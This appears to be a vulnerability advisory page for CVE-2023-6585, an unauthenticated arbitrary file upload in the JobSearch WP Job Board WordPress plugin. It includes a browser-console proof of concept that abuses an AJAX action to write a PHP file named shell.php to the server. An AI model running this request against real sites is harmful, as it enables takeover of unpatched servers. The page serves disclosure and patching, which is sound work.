Lucene search
Furkan GedikWPEX-ID:757412F4-E4F8-4007-8E3B-639A72B33180HistoryFeb 02, 2024 - 12:00 a.m.
JobSearch WP Job Board < 2.3.4 - Arbitrary File Upload to RCE
2024-02-0200:00:00
Furkan Gedik
73
arbitrary file upload
remote code execution
security vulnerability
website exploit
form data manipulation
Description The plugin does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server
Navigate to the site, and paste the following in your browser's console:
fetch('/wp-admin/admin-ajax.php', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: new URLSearchParams({
'action': 'jobsearch_facebook_get_soc_login_url',
'user_data': JSON.stringify({
"given_name": (Math.random()*0x1000).toFixed(),
"family_name": (Math.random()*0x1000).toFixed(),
"picture": "data:,<?php phpinfo(); //shell.php",
"name": (Math.random()*0x1000).toFixed(),
"email": (Math.random()*0x1000).toFixed(),
"id": (Math.random()*0x1000).toFixed(),
})
})
})
.then(response => response.text())
.then(data => console.log(data))
.catch(error => console.error('Error:', error));
Notice a new file named "shell.php" was uploaded to the site.Related
wpvulndb
wpvulndb
JobSearch WP Job Board < 2.3.4 - Arbitrary File Upload to RCE
2024-02-02 00:00:00
cve
cve
CVE-2023-6585
2024-02-27 09:15:37
vulnrichment
vulnrichment
CVE-2023-6585 JobSearch WP Job Board < 2.3.4 - Arbitrary File Upload to RCE
2024-02-27 08:30:25
prion
prion
Code injection
2024-02-27 09:15:00
nvd
nvd
CVE-2023-6585
2024-02-27 09:15:37
cvelist
cvelist
CVE-2023-6585 JobSearch WP Job Board < 2.3.4 - Arbitrary File Upload to RCE
2024-02-27 08:30:25
AI Score
7.2
Confidence
High
EPSS
0
Percentile
9.0%
Related for WPEX-ID:757412F4-E4F8-4007-8E3B-639A72B33180